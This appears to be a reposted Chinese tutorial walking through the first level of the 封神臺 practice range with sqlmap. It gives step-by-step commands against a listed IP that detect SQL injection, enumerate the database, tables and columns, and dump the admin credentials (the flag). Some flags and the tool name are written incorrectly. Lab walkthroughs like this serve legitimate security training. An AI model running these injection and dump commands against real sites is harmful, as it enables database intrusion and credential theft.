1. 程式人生 > 資料庫 >如何使用sqlmap破解封神臺靶場第一關

如何使用sqlmap破解封神臺靶場第一關

文章目錄

一.檢視是否有注入

使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch
-u指令為檢視網址的url是否有漏洞。-batch為永遠不要求使用者輸入資訊,預設執行。

在的這裡插入圖片描述我們可以看到,存在sql注入漏洞。

二.查詢當前資料庫

mysql.py -u http://59.63.200.79:8003/?id=1 -current-db -batch
-cuurent-db 意思為查詢當前的資料庫資訊,也可以用-dbs查詢所有的資料庫。
在這裡插入圖片描述

三.查詢資料庫的表

上面我們已知當前資料庫為 maoshe,所以我們指定資料庫查詢表。
mysql.py -u http://59.63.200.79:8003/?id=1 -D “maoshe” -tables -batch

-D為指定資料庫 -tables為查詢當前資料庫所在的表。
在這裡插入圖片描述得出查詢到的當前資料庫表為admin dirs news xss4個。

四.查詢表中的列

一般管理員的帳號密碼都會在admin裡面,所以我們可以檢視下admin裡面的欄位。
mysql.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -columns -batch
這裡的-t為指定表,然後使用-columns 檢視欄位名稱
在這裡插入圖片描述我們可以得知,欄位名稱為id,password,username三個。所以我們提取username和password就可以了。

五.查詢具體內容

使用 mysql.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C “username,password” -dump -batch

這裡的-C為指定欄位名稱,-dump代表查詢出欄位。
在這裡插入圖片描述最後我們得出admin密碼為helloback,這個就是本題的flag。